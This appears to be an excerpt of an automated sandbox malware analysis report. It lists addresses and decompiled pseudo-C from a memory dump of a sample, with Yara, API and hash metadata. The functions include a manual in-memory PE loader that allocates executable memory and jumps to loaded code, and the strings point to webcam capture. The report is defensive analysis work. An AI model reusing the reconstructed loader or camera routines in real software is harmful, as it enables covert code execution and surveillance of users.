                    			}






































                    0x00404372
                    0x00404373
                    0x00404377
                    0x0040437a
                    0x0040437f
                    0x00404381
                    0x00404383
                    0x0040439e
                    0x004043a1
                    0x004043a8
                    0x004043ad
                    0x004043b1
                    0x004043b5
                    0x004043bb
                    0x004043bd
                    0x0040441b
                    0x00404420
                    0x00404422
                    0x0040442d
                    0x0040442e
                    0x00404441
                    0x00404446
                    0x00404450
                    0x00404455
                    0x0040445f
                    0x00404468
                    0x0040446d
                    0x00404470
                    0x00404470
                    0x00404473
                    0x00404553
                    0x0040455a
                    0x0040456e
                    0x00404573
                    0x0040457c
                    0x0040457e
                    0x00404580
                    0x00404593
                    0x004045a4
                    0x004045ab
                    0x004045b0
                    0x004045b5
                    0x004045c4
                    0x004045cb
                    0x004045d7
                    0x004045dc
                    0x00000000
                    0x004045dc
                    0x00404479
                    0x00404479
                    0x00404479
                    0x0040447c
                    0x00404518
                    0x0040451f
                    0x00000000
                    0x00000000
                    0x00404482
                    0x00404482
                    0x00404482
                    0x00404485
                    0x00404506
                    0x0040450c
                    0x00404487
                    0x00404487
                    0x00404487
                    0x0040448a
                    0x004044f5
                    0x004044fb
                    0x00404500
                    0x00404502
                    0x00000000
                    0x00404504
                    0x00404525
                    0x00404541
                    0x00404543
                    0x00404543
                    0x0040448c
                    0x0040448c
                    0x0040448c
                    0x0040448f
                    0x00404495
                    0x0040449b
                    0x004044a0
                    0x004044a2
                    0x004044df
                    0x004044e9
                    0x004044ee
                    0x004045de
                    0x004045e1
                    0x004044a4
                    0x004044b6
                    0x004044bd
                    0x004044c4
                    0x004044cd
                    0x004044cf
                    0x004044d4
                    0x004044d4
                    0x004044a2
                    0x0040448f
                    0x0040448a
                    0x00404485
                    0x0040447c
                    0x004045e6
                    0x004045ea
                    0x004045f3
                    0x004045fb
                    0x00404600
                    0x00404606
                    0x004043bf
                    0x004043bf
                    0x004043c0
                    0x004043c3
                    0x004043c5
                    0x004043cc
                    0x004043d1
                    0x004043d3
                    0x004043dd
                    0x004043ee
                    0x00404400
                    0x0040440b
                    0x0040440b
                    0x004043d3
                    0x00404411
                    0x00000000
                    0x00404413
                    0x00404385
                    0x00404385
                    0x00404397
                    0x00404414
                    0x00404416
                    0x00404416

                    APIs
                    • Sleep.KERNEL32(00000000,0040D06B), ref: 004044C4
                      • Part of subcall function 00404607: __EH_prolog.LIBCMT ref: 0040460C
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: H_prologSleep
                    • String ID: 0>G$CloseCamera$FreeFrame$GetFrame$OpenCamera
                    • API String ID: 3469354165-3377146479
                    • Opcode ID: a0ac88a7ecc3de97c17da0afc71abacd49127a14eccc16d1111bda10a6c1cb6c
                    • Instruction ID: 26c47d1ecaceda0d4caea1ac515c433c92bae5ac6780bbd5fdfad2dcf1796053
                    • Opcode Fuzzy Hash: a0ac88a7ecc3de97c17da0afc71abacd49127a14eccc16d1111bda10a6c1cb6c
                    • Instruction Fuzzy Hash: CF51E271A042106BCA14BB7A9D0A66E3755ABC1788F00443FFA06677E2DF7C9E45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E00411B07(intOrPtr* __ecx, intOrPtr __edx, void* __eflags) {
                    				signed int _t52;
                    				signed int _t55;
                    				void* _t58;
                    				signed int _t66;
                    				signed int _t68;
                    				void* _t73;
                    				signed int _t74;
                    				void* _t75;
                    				signed int _t77;
                    				signed int _t78;
                    				signed int _t80;
                    				signed int _t81;
                    				signed int _t82;
                    				void* _t86;
                    				signed int _t87;
                    				intOrPtr* _t90;
                    				signed int _t104;
                    				void* _t106;
                    				signed int _t109;
                    				void* _t115;
                    				void* _t116;
                    				signed int _t117;
                    				signed int _t119;
                    				void* _t121;
                    				signed int _t123;
                    				signed int _t126;
                    				void* _t127;
                    				void* _t128;
                    
                    				_t106 = 0x40;
                    				 *((intOrPtr*)(_t127 + 0x10)) = __edx;
                    				 *((intOrPtr*)(_t127 + 0xc)) = __ecx;
                    				_t119 = 0;
                    				if(E004115A5(__edx, _t106) != 0) {
                    					__eflags =  *__ecx - 0x5a4d;
                    					if( *__ecx == 0x5a4d) {
                    						_t52 = E004115A5(__edx,  *((intOrPtr*)(__ecx + 0x3c)) + 0xf8);
                    						__eflags = _t52;
                    						if(_t52 == 0) {
                    							goto L1;
                    						}
                    						_t90 =  *((intOrPtr*)(__ecx + 0x3c)) + __ecx;
                    						__eflags =  *_t90 - 0x4550;
                    						if( *_t90 != 0x4550) {
                    							goto L3;
                    						}
                    						__eflags =  *((intOrPtr*)(_t90 + 4)) - 0x14c;
                    						if( *((intOrPtr*)(_t90 + 4)) != 0x14c) {
                    							goto L3;
                    						}
                    						__eflags =  *(_t90 + 0x38) & 0x00000001;
                    						if(( *(_t90 + 0x38) & 0x00000001) != 0) {
                    							goto L3;
                    						}
                    						_t109 =  *(_t90 + 6) & 0x0000ffff;
                    						_t55 =  *(_t90 + 0x14) & 0x0000ffff;
                    						__eflags = _t109;
                    						if(_t109 == 0) {
                    							L14:
                    							__imp__GetNativeSystemInfo(_t127 + 0x18, _t115);
                    							_t116 = E00411594( *((intOrPtr*)(_t90 + 0x50)),  *((intOrPtr*)(_t127 + 0x1c)));
                    							_t58 = E00411594(_t119,  *((intOrPtr*)(_t127 + 0x1c)));
                    							__eflags = _t116 - _t58;
                    							if(_t116 == _t58) {
                    								_push(0);
                    								_t126 = E00411AAC( *((intOrPtr*)(_t90 + 0x34)), _t116, 0x3000, 0x40);
                    								_t128 = _t127 + 0x14;
                    								__eflags = _t126;
                    								if(_t126 != 0) {
                    									L20:
                    									_t117 = HeapAlloc(GetProcessHeap(), 8, 0x40);
                    									__eflags = _t117;
                    									if(_t117 != 0) {
                    										 *(_t117 + 4) = _t126;
                    										 *((intOrPtr*)(_t117 + 0x1c)) = E00411AAC;
                    										 *(_t117 + 0x14) = ( *(_t90 + 0x16) & 0x0000ffff) >> 0x0000000d & 0x00000001;
                    										 *((intOrPtr*)(_t117 + 0x20)) = E00411AC3;
                    										 *((intOrPtr*)(_t117 + 0x24)) = E00411AD6;
                    										 *((intOrPtr*)(_t117 + 0x28)) = E00411AE1;
                    										 *((intOrPtr*)(_t117 + 0x2c)) = E00411AF0;
                    										 *((intOrPtr*)(_t117 + 0x34)) = 0;
                    										 *((intOrPtr*)(_t117 + 0x3c)) =  *((intOrPtr*)(_t128 + 0x1c));
                    										_t66 = E004115A5( *((intOrPtr*)(_t128 + 0x14)),  *((intOrPtr*)(_t90 + 0x54)));
                    										__eflags = _t66;
                    										if(_t66 == 0) {
                    											L34:
                    											E00411E80(_t117);
                    											L35:
                    											_t68 = 0;
                    											__eflags = 0;
                    											L36:
                    											return _t68;
                    										}
                    										_push(0);
                    										_t121 = E00411AAC(_t126,  *((intOrPtr*)(_t90 + 0x54)), 0x1000, 4);
                    										E00436320(_t121,  *((intOrPtr*)(_t128 + 0x28)),  *((intOrPtr*)(_t90 + 0x54)));
                    										_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t128 + 0x30)) + 0x3c)) + _t121;
                    										 *_t117 = _t73;
                    										 *(_t73 + 0x34) = _t126;
                    										_t74 = E004115B8( *((intOrPtr*)(_t128 + 0x34)), _t90, _t117);
                    										__eflags = _t74;
                    										if(_t74 == 0) {
                    											goto L34;
                    										}
                    										_t75 =  *_t117;
                    										_t114 =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                    										__eflags =  *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34));
                    										if( *((intOrPtr*)(_t75 + 0x34)) ==  *((intOrPtr*)(_t90 + 0x34))) {
                    											_t123 = 1;
                    											__eflags = 1;
                    											 *((intOrPtr*)(_t117 + 0x18)) = 1;
                    										} else {
                    											 *((intOrPtr*)(_t117 + 0x18)) = E004118BC(_t114);
                    											_t123 = 1;
                    										}
                    										__eflags = E00411968(_t117);
                    										if(__eflags != 0) {
                    											_t77 = E00411758(_t117, __eflags);
                    											__eflags = _t77;
                    											if(_t77 == 0) {
                    												goto L34;
                    											}
                    											_t78 = E0041188B(_t117);
                    											__eflags = _t78;
                    											if(_t78 == 0) {
                    												goto L34;
                    											}
                    											_t80 =  *( *_t117 + 0x28);
                    											__eflags = _t80;
                    											if(_t80 == 0) {
                    												_t48 = _t117 + 0x38;
                    												 *_t48 =  *(_t117 + 0x38) & 0x00000000;
                    												__eflags =  *_t48;
                    												L41:
                    												_t68 = _t117;
                    												goto L36;
                    											}
                    											_t81 = _t80 + _t126;
                    											__eflags =  *(_t117 + 0x14);
                    											if( *(_t117 + 0x14) == 0) {
                    												 *(_t117 + 0x38) = _t81;
                    												goto L41;
                    											}
                    											_t82 =  *_t81(_t126, _t123, 0);
                    											__eflags = _t82;
                    											if(_t82 != 0) {
                    												 *((intOrPtr*)(_t117 + 0x10)) = _t123;
                    												goto L41;
                    											}
                    											SetLastError(0x45a);
                    										}
                    										goto L34;
                    									}
                    									_push(0);
                    									E00411AC3(_t126, 0, 0x8000);
                    									L19:
                    									SetLastError(0xe);
                    									L16:
                    									goto L35;
                    								}
                    								_push(0);
                    								_t126 = E00411AAC(0, _t116, 0x3000, 0x40);
                    								_t128 = _t128 + 0x14;
                    								__eflags = _t126;
                    								if(_t126 != 0) {
                    									goto L20;
                    								}
                    								goto L19;
                    							}
                    							SetLastError(0xc1);
                    							goto L16;
                    						}
                    						_t104 = _t90 + 0x24 + _t55;
                    						__eflags = _t104;
                    						do {
                    							__eflags =  *(_t104 + 4);
                    							_t86 =  *_t104;
                    							if( *(_t104 + 4) != 0) {
                    								_t87 = _t86 +  *(_t104 + 4);
                    								__eflags = _t87;
                    							} else {
                    								_t87 = _t86 +  *(_t90 + 0x38);
                    							}
                    							__eflags = _t87 - _t119;
                    							_t119 =  >  ? _t87 : _t119;
                    							_t104 = _t104 + 0x28;
                    							_t109 = _t109 - 1;
                    							__eflags = _t109;
                    						} while (_t109 != 0);
                    						goto L14;
                    					}
                    					L3:
                    					SetLastError(0xc1);
                    				}
                    				L1:
                    				return 0;
                    			}































                    0x00411b13
                    0x00411b16
                    0x00411b1a
                    0x00411b1e
                    0x00411b27
                    0x00411b35
                    0x00411b39
                    0x00411b53
                    0x00411b58
                    0x00411b5a
                    0x00000000
                    0x00000000
                    0x00411b5f
                    0x00411b61
                    0x00411b67
                    0x00000000
                    0x00000000
                    0x00411b6e
                    0x00411b72
                    0x00000000
                    0x00000000
                    0x00411b74
                    0x00411b78
                    0x00000000
                    0x00000000
                    0x00411b7a
                    0x00411b7e
                    0x00411b82
                    0x00411b84
                    0x00411ba8
                    0x00411bae
                    0x00411bc2
                    0x00411bc4
                    0x00411bc9
                    0x00411bcb
                    0x00411bdf
                    0x00411bf0
                    0x00411bf2
                    0x00411bf5
                    0x00411bf7
                    0x00411c15
                    0x00411c26
                    0x00411c28
                    0x00411c2a
                    0x00411c42
                    0x00411c4f
                    0x00411c56
                    0x00411c59
                    0x00411c60
                    0x00411c67
                    0x00411c6e
                    0x00411c75
                    0x00411c7c
                    0x00411c82
                    0x00411c87
                    0x00411c89
                    0x00411d39
                    0x00411d3b
                    0x00411d40
                    0x00411d40
                    0x00411d40
                    0x00411d42
                    0x00000000
                    0x00411d42
                    0x00411c8f
                    0x00411ca3
                    0x00411caa
                    0x00411cbf
                    0x00411cc1
                    0x00411cc4
                    0x00411cc7
                    0x00411ccf
                    0x00411cd1
                    0x00000000
                    0x00000000
                    0x00411cd3
                    0x00411cd8
                    0x00411cd8
                    0x00411cdb
                    0x00411cee
                    0x00411cee
                    0x00411cef
                    0x00411cdd
                    0x00411ce6
                    0x00411ce9
                    0x00411ce9
                    0x00411cf9
                    0x00411cfb
                    0x00411cff
                    0x00411d04
                    0x00411d06
                    0x00000000
                    0x00000000
                    0x00411d0a
                    0x00411d0f
                    0x00411d11
                    0x00000000
                    0x00000000
                    0x00411d15
                    0x00411d18
                    0x00411d1a
                    0x00411d54
                    0x00411d54
                    0x00411d54
                    0x00411d58
                    0x00411d58
                    0x00000000
                    0x00411d58
                    0x00411d1c
                    0x00411d1e
                    0x00411d22
                    0x00411d4f
                    0x00000000
                    0x00411d4f
                    0x00411d28
                    0x00411d2a
                    0x00411d2c
                    0x00411d4a
                    0x00000000
                    0x00411d4a
                    0x00411d33
                    0x00411d33
                    0x00000000
                    0x00411cfb
                    0x00411c2c
                    0x00411c34
                    0x00411c11
                    0x00411bd2
                    0x00411bd2
                    0x00000000
                    0x00411bd2
                    0x00411bf9
                    0x00411c08
                    0x00411c0a
                    0x00411c0d
                    0x00411c0f
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00411c0f
                    0x00411bd2
                    0x00000000
                    0x00411bd2
                    0x00411b89
                    0x00411b89
                    0x00411b8b
                    0x00411b8b
                    0x00411b8f
                    0x00411b91
                    0x00411b98
                    0x00411b98
                    0x00411b93
                    0x00411b93
                    0x00411b93
                    0x00411b9b
                    0x00411b9d
                    0x00411ba0
                    0x00411ba3
                    0x00411ba3
                    0x00411ba3
                    0x00000000
                    0x00411b8b
                    0x00411b3b
                    0x00411b40
                    0x00411b40
                    0x00411b29
                    0x00000000

                    APIs
                      • Part of subcall function 004115A5: SetLastError.KERNEL32(0000000D,00411B25,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411B03), ref: 004115AB
                    • SetLastError.KERNEL32(000000C1,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411B03), ref: 00411B40
                    • GetNativeSystemInfo.KERNEL32(?,0040D0AB,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00411B03), ref: 00411BAE
                    • SetLastError.KERNEL32(0000000E,?,?,?,?,?,?,?,?,?), ref: 00411BD2
                      • Part of subcall function 00411AAC: VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411BF0,?,00000000,00003000,00000040,00000000,?,?), ref: 00411ABC
                    • GetProcessHeap.KERNEL32(00000008,00000040,?,?,?,?,?), ref: 00411C19
                    • HeapAlloc.KERNEL32(00000000,?,?,?,?,?), ref: 00411C20
                    • SetLastError.KERNEL32(0000045A,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411D33
                      • Part of subcall function 00411E80: GetProcessHeap.KERNEL32(00000000,00000000,?,00000000,00411D40,?,?,?,?,?), ref: 00411EF0
                      • Part of subcall function 00411E80: HeapFree.KERNEL32(00000000,?,?,?,?,?), ref: 00411EF7
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: ErrorHeapLast$AllocProcess$FreeInfoNativeSystemVirtual
                    • String ID:
                    • API String ID: 3950776272-0
                    • Opcode ID: 3786f948759b351624d81fc1bab35f9ee2250ccf3c9570eea85df558342eca7e
                    • Instruction ID: 549d70d1c55657f7fd8712f64d3a3b3c84165890bb2f725288443ecf158c91cc
                    • Opcode Fuzzy Hash: 3786f948759b351624d81fc1bab35f9ee2250ccf3c9570eea85df558342eca7e
                    • Instruction Fuzzy Hash: 67610770601201ABD7109F26DD81BAB7BA5BF84744F04401BFB068B7A2EB7CE8C5C799
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 80%
                    			E004452EB(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8) {
                    				signed int _v8;
                    				char _v32;
                    				intOrPtr _v36;
                    				intOrPtr _v40;
                    				char* _v44;
                    				char _v48;
                    				void* __ecx;
                    				signed int _t67;
                    				signed int _t70;
                    				signed int _t71;
                    				signed int _t75;
                    				intOrPtr _t76;
                    				signed int _t79;
                    				signed int _t86;
                    				intOrPtr _t88;
                    				signed int _t99;
                    				void* _t101;
                    				void* _t103;
                    				void* _t108;
                    				signed int _t112;
                    				signed int _t113;
                    				signed int _t116;
                    				signed int _t123;
                    				signed int _t125;
                    				intOrPtr _t126;
                    				signed int _t128;
                    				intOrPtr _t130;
                    				signed int _t131;
                    				void* _t135;
                    				void* _t136;
                    				void* _t138;
                    
                    				_t120 = __edx;
                    				_t97 = __ebx;
                    				_push(_t101);
                    				if(_a8 != 0) {
                    					_push(__esi);
                    					_push(__edi);
                    					_t123 = 0;
                    					_t67 = E004408CD( &_v8, 0, 0, _a8, 0x7fffffff);
                    					_t136 = _t135 + 0x14;
                    					__eflags = _t67;
                    					if(_t67 == 0) {
                    						L5:
                    						_t128 = E004454E5(_t101, _v8, 2);
                    						_pop(_t103);
                    						__eflags = _t128;
                    						if(_t128 == 0) {
                    							L11:
                    							E00446172(_t128);
                    							_t70 = _t123;
                    							goto L12;
                    						} else {
                    							_t71 = E004408CD(_t123, _t128, _v8, _a8, 0xffffffff);
                    							_t136 = _t136 + 0x14;
                    							__eflags = _t71;
                    							if(_t71 == 0) {
                    								_t123 = E0044466D(_t97, _t103, _t120, _a4, _t128);
                    								goto L11;
                    							} else {
                    								__eflags = _t71 - 0x16;
                    								if(_t71 == 0x16) {
                    									goto L13;
                    								} else {
                    									__eflags = _t71 - 0x22;
                    									if(_t71 != 0x22) {
                    										goto L11;
                    									} else {
                    										goto L13;
                    									}
                    								}
                    							}
                    						}
                    					} else {
                    						__eflags = _t67 - 0x16;
                    						if(_t67 == 0x16) {
                    							L13:
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							_push(_t123);
                    							E0043B6DD();
                    							asm("int3");
                    							E00434800(0x46d9d0, 0x1c);
                    							_t130 = _a4;
                    							_t75 = E004452EB(_t97, _t120, _t123, _t130, _t130, _a8);
                    							_t108 = _t123;
                    							_t125 = _t75;
                    							__eflags = _t125;
                    							if(_t125 != 0) {
                    								_t76 = E00447C05(_t97, _t108, _t120);
                    								_v40 = _t76;
                    								_v48 =  *((intOrPtr*)(_t76 + 0x4c));
                    								_t110 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v44 =  *((intOrPtr*)(_t76 + 0x48));
                    								_v32 = 0;
                    								_t79 = E00440FFB( *((intOrPtr*)(_t76 + 0x48)),  &_v32, 0, 0, _t125, 0,  &_v48);
                    								_t138 = _t136 + 0x18;
                    								__eflags = _t79;
                    								if(_t79 == 0) {
                    									L22:
                    									_t99 = E00445B29(_t110, _v32 + 4);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										goto L15;
                    									} else {
                    										_t20 = _t99 + 4; // 0x4
                    										_v36 = _t20;
                    										_t110 =  &_v48;
                    										_t125 = 0;
                    										_t86 = E00440FFB( &_v48, 0, _t20, _v32, 0, 0xffffffff,  &_v48);
                    										_t138 = _t138 + 0x18;
                    										__eflags = _t86;
                    										if(_t86 == 0) {
                    											L29:
                    											_t126 = _v48;
                    											E0044527A(4);
                    											_pop(_t112);
                    											_v8 = _v8 & 0x00000000;
                    											_t131 = _t130 + _t130;
                    											_t113 = _t112 | 0xffffffff;
                    											__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    											if(__eflags != 0) {
                    												asm("lock xadd [edx], eax");
                    												if(__eflags == 0) {
                    													E00446172( *(_t126 + 0x24 + _t131 * 8));
                    													_pop(_t116);
                    													 *(_t126 + 0x24 + _t131 * 8) =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    													_t113 = _t116 | 0xffffffff;
                    													__eflags = _t113;
                    												}
                    											}
                    											_t88 = _v40;
                    											__eflags =  *(_t88 + 0x350) & 0x00000002;
                    											if(( *(_t88 + 0x350) & 0x00000002) == 0) {
                    												__eflags =  *0x4709a4 & 0x00000001;
                    												if(( *0x4709a4 & 0x00000001) == 0) {
                    													__eflags =  *(_t126 + 0x24 + _t131 * 8);
                    													if( *(_t126 + 0x24 + _t131 * 8) != 0) {
                    														asm("lock xadd [eax], ecx");
                    														__eflags = _t113 == 1;
                    														if(_t113 == 1) {
                    															E00446172( *(_t126 + 0x24 + _t131 * 8));
                    															_t51 = _t126 + 0x24 + _t131 * 8;
                    															 *_t51 =  *(_t126 + 0x24 + _t131 * 8) & 0x00000000;
                    															__eflags =  *_t51;
                    														}
                    													}
                    												}
                    											}
                    											 *_t99 =  *((intOrPtr*)(_t126 + 0xc));
                    											 *(_t126 + 0x24 + _t131 * 8) = _t99;
                    											 *((intOrPtr*)(_t126 + 0x1c + _t131 * 8)) = _v36;
                    											_v8 = 0xfffffffe;
                    											E004454DC();
                    										} else {
                    											__eflags = _t86 - 0x16;
                    											if(_t86 == 0x16) {
                    												L26:
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												_push(_t125);
                    												goto L20;
                    											} else {
                    												__eflags = _t86 - 0x22;
                    												if(_t86 != 0x22) {
                    													__eflags = _t86;
                    													if(_t86 == 0) {
                    														goto L29;
                    													} else {
                    														E00446172(_t99);
                    														goto L15;
                    													}
                    												} else {
                    													goto L26;
                    												}
                    											}
                    										}
                    									}
                    								} else {
                    									__eflags = _t79 - 0x16;
                    									if(_t79 == 0x16) {
                    										L19:
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										_push(0);
                    										L20:
                    										_t79 = E0043B6DD();
                    									} else {
                    										__eflags = _t79 - 0x22;
                    										if(_t79 == 0x22) {
                    											goto L19;
                    										}
                    									}
                    									__eflags = _t79;
                    									if(_t79 != 0) {
                    										goto L15;
                    									} else {
                    										goto L22;
                    									}
                    								}
                    							} else {
                    								L15:
                    							}
                    							return E00434846();
                    						} else {
                    							__eflags = _t67 - 0x22;
                    							if(_t67 == 0x22) {
                    								goto L13;
                    							} else {
                    								goto L5;
                    							}
                    						}
                    					}
                    				} else {
                    					_t70 = E0044466D(__ebx, _t101, __edx, _a4, 0);
                    					L12:
                    					return _t70;
                    				}
                    			}


































                    0x004452eb
                    0x004452eb
                    0x004452f0
                    0x004452f5
                    0x00445305
                    0x00445306
                    0x0044530f
                    0x00445317
                    0x0044531c
                    0x0044531f
                    0x00445321
                    0x0044532d
                    0x00445337
                    0x0044533a
                    0x0044533b
                    0x0044533d
                    0x0044536e
                    0x0044536f
                    0x00445375
                    0x00000000
                    0x0044533f
                    0x00445349
                    0x0044534e
                    0x00445351
                    0x00445353
                    0x0044536c
                    0x00000000
                    0x00445355
                    0x00445355
                    0x00445358
                    0x00000000
                    0x0044535a
                    0x0044535a
                    0x0044535d
                    0x00000000
                    0x0044535f
                    0x00000000
                    0x0044535f
                    0x0044535d
                    0x00445358
                    0x00445353
                    0x00445323
                    0x00445323
                    0x00445326
                    0x0044537d
                    0x0044537d
                    0x0044537e
                    0x0044537f
                    0x00445380
                    0x00445382
                    0x00445387
                    0x0044538f
                    0x00445397
                    0x0044539b
                    0x004453a1
                    0x004453a2
                    0x004453a4
                    0x004453a6
                    0x004453af
                    0x004453b4
                    0x004453ba
                    0x004453bd
                    0x004453c0
                    0x004453c5
                    0x004453d4
                    0x004453d9
                    0x004453dc
                    0x004453de
                    0x004453f8
                    0x00445405
                    0x00445407
                    0x00445409
                    0x00000000
                    0x0044540b
                    0x0044540b
                    0x0044540e
                    0x00445411
                    0x0044541c
                    0x0044541f
                    0x00445424
                    0x00445427
                    0x00445429
                    0x0044544c
                    0x0044544c
                    0x00445451
                    0x00445456
                    0x00445457
                    0x0044545b
                    0x00445461
                    0x00445464
                    0x00445466
                    0x0044546a
                    0x0044546e
                    0x00445474
                    0x00445479
                    0x0044547a
                    0x0044547f
                    0x0044547f
                    0x0044547f
                    0x0044546e
                    0x00445482
                    0x00445485
                    0x0044548c
                    0x0044548e
                    0x00445495
                    0x0044549b
                    0x0044549d
                    0x0044549f
                    0x004454a3
                    0x004454a4
                    0x004454aa
                    0x004454b0
                    0x004454b0
                    0x004454b0
                    0x004454b0
                    0x004454a4
                    0x0044549d
                    0x00445495
                    0x004454b8
                    0x004454ba
                    0x004454c1
                    0x004454c5
                    0x004454cc
                    0x0044542b
                    0x0044542b
                    0x0044542e
                    0x00445435
                    0x00445435
                    0x00445436
                    0x00445437
                    0x00445438
                    0x00445439
                    0x00000000
                    0x00445430
                    0x00445430
                    0x00445433
                    0x0044543c
                    0x0044543e
                    0x00000000
                    0x00445440
                    0x00445441
                    0x00000000
                    0x00445446
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00445433
                    0x0044542e
                    0x00445429
                    0x004453e0
                    0x004453e0
                    0x004453e3
                    0x004453ea
                    0x004453ea
                    0x004453eb
                    0x004453ec
                    0x004453ed
                    0x004453ee
                    0x004453ef
                    0x004453ef
                    0x004453e5
                    0x004453e5
                    0x004453e8
                    0x00000000
                    0x00000000
                    0x004453e8
                    0x004453f4
                    0x004453f6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x004453f6
                    0x004453a8
                    0x004453a8
                    0x004453a8
                    0x004454d8
                    0x00445328
                    0x00445328
                    0x0044532b
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0044532b
                    0x00445326
                    0x004452f7
                    0x004452fc
                    0x00445379
                    0x0044537c
                    0x0044537c

                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: __cftoe
                    • String ID:
                    • API String ID: 4189289331-0
                    • Opcode ID: d4de0b2bde906712754d9bd778319aa14829d0d2b076e24fd04ad98323b6baf6
                    • Instruction ID: feec67b19e380ad25ed36f891e071e1058943c651ab314cdb632d192b3120123
                    • Opcode Fuzzy Hash: d4de0b2bde906712754d9bd778319aa14829d0d2b076e24fd04ad98323b6baf6
                    • Instruction Fuzzy Hash: AA511B32900605ABFF249F698C41FAF77A8AF49364F24421FF81496293EB7CDD41866C
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 68%
                    			E00446F61(void* __ebx, signed int __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, signed int** _a16, signed int* _a20, intOrPtr _a24) {
                    				signed int _v8;
                    				short _v10;
                    				short _v12;
                    				short _v14;
                    				short _v16;
                    				short _v18;
                    				short _v22;
                    				char _v24;
                    				signed int _v28;
                    				signed int* _v32;
                    				signed int _v33;
                    				signed int** _v40;
                    				intOrPtr _v44;
                    				intOrPtr* _v48;
                    				intOrPtr _v52;
                    				void* _v64;
                    				signed int _t86;
                    				intOrPtr _t91;
                    				signed int _t94;
                    				signed int _t95;
                    				signed int _t96;
                    				signed int _t98;
                    				signed int _t102;
                    				signed int _t103;
                    				signed int _t104;
                    				intOrPtr _t105;
                    				signed int _t110;
                    				void* _t111;
                    				signed int _t116;
                    				signed int _t117;
                    				signed int _t129;
                    				void* _t133;
                    				signed int _t135;
                    				intOrPtr _t143;
                    				signed short* _t144;
                    				intOrPtr _t145;
                    				signed int** _t146;
                    				signed int _t147;
                    				signed int* _t148;
                    				signed int _t149;
                    				signed int _t152;
                    				signed short** _t154;
                    				signed int _t155;
                    				signed int _t159;
                    				signed int _t163;
                    				intOrPtr* _t171;
                    				signed short _t172;
                    				signed short* _t173;
                    				signed int** _t174;
                    				void* _t175;
                    				void* _t177;
                    				signed short* _t179;
                    				intOrPtr* _t180;
                    				intOrPtr* _t181;
                    				signed int* _t183;
                    				signed int _t184;
                    				signed int** _t185;
                    				signed int _t186;
                    				signed int _t187;
                    				signed int _t188;
                    
                    				_t149 = __ecx;
                    				_t86 =  *0x47000c; // 0xc3a97826
                    				_v8 = _t86 ^ _t187;
                    				_t171 = _a12;
                    				_v52 = _a4;
                    				_t143 = _a24;
                    				_v40 = _a16;
                    				_v48 = _t171;
                    				_v44 = _t143;
                    				_t183 = _a20;
                    				_v32 = _t183;
                    				_t91 = _a8;
                    				if(_t91 == 0) {
                    					_t179 =  *(_t143 + 0x154);
                    				} else {
                    					if(_t91 == 1) {
                    						_t179 =  *(_t143 + 0x158);
                    					} else {
                    						_t179 =  *(_t143 + 0x15c);
                    					}
                    				}
                    				if( *((intOrPtr*)(_t143 + 0xac)) == 1) {
                    					goto L113;
                    				} else {
                    					_t163 = _t149 & 0xffffff00 | _a8 == 0x00000002;
                    					_v24 = 0x76c +  *((intOrPtr*)(_t171 + 0x14));
                    					_v33 = _t163;
                    					_v22 =  *((intOrPtr*)(_t171 + 0x10)) + 1;
                    					_v18 =  *((intOrPtr*)(_t171 + 0xc));
                    					_v16 =  *((intOrPtr*)(_t171 + 8));
                    					_v14 =  *((intOrPtr*)(_t171 + 4));
                    					_v12 =  *_t171;
                    					_v10 = 0;
                    					_t194 = _t163;
                    					if(_t163 == 0) {
                    						__eflags = 0;
                    						_t129 = E0044827A(0, _t183, 0,  *((intOrPtr*)(_t143 + 0x160)), 0,  &_v24, _t179, 0, 0, 0);
                    					} else {
